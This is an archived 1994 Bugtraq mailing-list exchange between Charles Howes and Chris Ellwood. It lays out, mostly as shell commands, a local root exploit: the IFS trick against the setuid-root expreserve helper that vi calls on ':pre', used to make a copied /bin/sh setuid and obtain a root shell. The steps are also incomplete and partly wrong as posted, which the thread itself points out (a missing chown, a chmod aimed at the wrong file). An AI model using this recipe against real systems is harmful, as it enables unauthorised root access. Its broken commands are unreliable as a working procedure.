|
Bugtraq
mailing list archives
Re: chmod 000 .rhosts - works?
From: chowes () helix net (Charles Howes)
Date: Mon, 17 Oct 1994 02:46:30 -0700 (PDT)
On Sun, 16 Oct 1994, Chris Ellwood wrote:
Charles Howes said...
ObBug: vi runs expreserve when it crashes or you type ':pre' (on some
versions). Expreserve is setuid root. Expreserve runs /bin/mail
with 'system()'. So, do the following:
% cd /tmp
% cp /bin/sh fubar
% cat > bin
chmod 4755 fubar
^D
% chmod u+x fubar
I see a couple problems with the script so far. /bin/sh was copied
to fubar while you are a regular user, so it will be owned by you
and you'll end up with a nice copy of /bin/sh that's setuid to you,
not your target user. Also, that last line should probably read
'chmod u+x bin', not fubar.
Ooops, forgot the chown. Sigh. Trust memory to lose things.
% setenv IFS=/
% vi
:pre
:q
% fubar
#
Some versions of expreserve don't have the hole.
Some versions of vi don't have the :pre command.
One does not imply the other.
Thanks for posting it anyway.
- Chris
--
Charles Howes -- chowes () helix net
Always tell the truth, then you make it the other bloke's problem!
- Sean Connery, 1971
 By Date 
By Thread
Current thread:
| 
Intro
